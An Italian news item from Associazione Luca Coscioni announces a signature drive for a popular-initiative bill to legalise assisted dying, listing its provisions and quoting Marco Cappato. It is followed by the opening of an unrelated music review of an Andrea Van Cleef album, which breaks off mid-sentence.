La proposta di legge, depositata in Corte di Cassazione, su cui inizia la raccolta firme, prevede la possibilità per ogni persona maggiorenne, pienamente capace di prendere decisioni libere e consapevoli, affetta da una condizione o patologia irreversibile o da una patologia con una prognosi infausta a breve termine, fonte di sofferenze fisiche o psicologiche ritenute intollerabili, di richiedere, previa verifica delle condizioni, assistenza per porre fine volontariamente alla propria vita mediante autosomministrazione o somministrazione dei farmaci per il fine vita.

La legge prevede:

  • la libertà di scelta tra autosomministrazione o somministrazione da parte di un medico;
  • la presa in carico da parte del Servizio sanitario nazionale, con conclusione delle verifiche entro 30 giorni dalla richiesta;
  • la possibilità per i medici di partecipare su base volontaria.

Il testo mira a superare le disuguaglianze territoriali e a garantire un diritto esigibile in tutto il Paese, nel rispetto dei principi costituzionali di autodeterminazione, dignità e umanità.

“Le persone con patologie irreversibili e sofferenze insopportabili hanno già diritto da sette anni a essere aiutate a morire senza soffrire in Italia grazie alla sentenza della Corte Costituzionale – dichiara Marco Cappato, Tesoriere Associazione Luca Coscioni -. Ora il Governo vuole restringere e cancellare questo diritto eliminando il ruolo del Servizio Sanitario Nazionale. Come Associazione Luca Coscioni invece proponiamo attraverso la legge di Iniziativa Popolare Eutanasia Legale di estendere il diritto ad essere aiutati anche da parte di un medico e anche per le persone che non siano dipendenti da trattamenti sanitari come i malattie terminali di cancro. Dopo aver raccolto 50.000 firme, a nome delle persone che avranno aderito presenteremo questa proposta entro metà luglio e il Parlamento dovrà discuterne quando avvierà il dibattito sul tema, dal 17 luglio in poi”.

Il testo integrale della proposta di legge, il materiale informativo e la mappa aggiornata dei tavoli per la raccolta firme sono disponibili QUI


L'articolo Al via la raccolta firme della proposta di iniziativa popolare per legalizzare tutte le scelte di Fine vita proviene da Associazione Luca Coscioni.




Andrea Van Cleef – Greetings from Slaughter Creek
freezonemagazine.com/articoli/…
Passo dopo passo, Andrea Van Cleef, sta conquistando un posto sempre più rilevante nel cuore degli appassionati. E questo grazie ad alcuni dati oggettivi che è facile rilevare. Vogliamo partire dalla voce? Quanti possono vantare un timbro vocale tanto profondo e toccante senza bisogno di sbraitare inutilmente? In Italia direi pochi, forse nessuno, almeno, a